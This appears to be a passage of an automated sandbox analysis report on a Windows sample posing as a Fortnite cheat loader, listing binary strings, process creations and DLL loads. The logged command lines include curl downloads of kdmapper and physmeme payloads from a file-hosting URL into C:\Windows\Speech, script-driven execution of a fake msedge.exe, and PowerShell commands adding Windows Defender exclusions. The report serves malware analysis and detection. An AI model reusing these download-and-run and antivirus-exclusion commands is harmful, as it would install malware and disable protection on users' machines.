Source: seoI30IZZr.exe	String found in binary or memory: CombatVisualsWeaponConfigMisc##MainAimbotPredictionTriggerbotTriggerbot Delay (ms)Triggerbot Distance (m)Fov CircleFilled FovFov SizeSmoothingHitboxCorner 2D 3D NothingRankDraw FilledUsernameSnaplineSkeletonFov ArrowsDistanceRender CountWeapon configShotgun SettingsShotgun SmoothShotgun FovSMG SettingsPrediction SMG SmoothSMG FovRifle SettingsPrediction Rifle SmoothRifle FovSniper SettingsPrediction Sniper SmoothSniper Fov(AIR STUCK)RISKY FEATURE:Air StuckUnload##Main1Save/LoadSave Configconfig.jsonLoad Config##MainsLegit ConfigSemi ConfigRage ConfigReaper Sniper RifleBolt-Action Sniper RifleHeavy Sniper RifleStorm Scout Sniper RifleHunting RiflePump ShotgunTactical ShotgunCharge ShotgunSuppressed SMGCompact SMGRapid Fire SMGAssault RifleBurst Assault RifleTactical Assault RifleThermal Scoped Assault RifleScoped Assault RiflePumpShotgunTacticalShotgunChargeShotgunLeverActionShotgunDragonBreathShotgunDoubleBarrelShotgunAutoShotgunSingleShotgunCombatShotgunSlugShotgunVisible Entities: Nearby Entities: HandsBronze 1Bronze 2Bronze 3Silver 1Silver 2Silver 3Gold 1Gold 2Gold 3Platinum 1Platinum 2Platinum 3Diamond 1Diamond 2Diamond 3EliteChampionUnrealUnrankedm] Load Dependencies (Close Game First) Inject Orqur Your choice: cls Driver FoundDriver Error Contact Support. Waiting For FortniteFortniteClient-Win64-Shipping.exeThe driver could not get the base address...Base Address -> VAText -> cr3 -> vector too long\|\XN[ZWQ'a5*!)0h-/?).:4

Source: unknown	Process created: C:\Users\user\Desktop\seoI30IZZr.exe "C:\Users\user\Desktop\seoI30IZZr.exe"
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: unknown	Process created: C:\Edge\msedge.exe C:\Edge\msedge.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\seoI30IZZr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
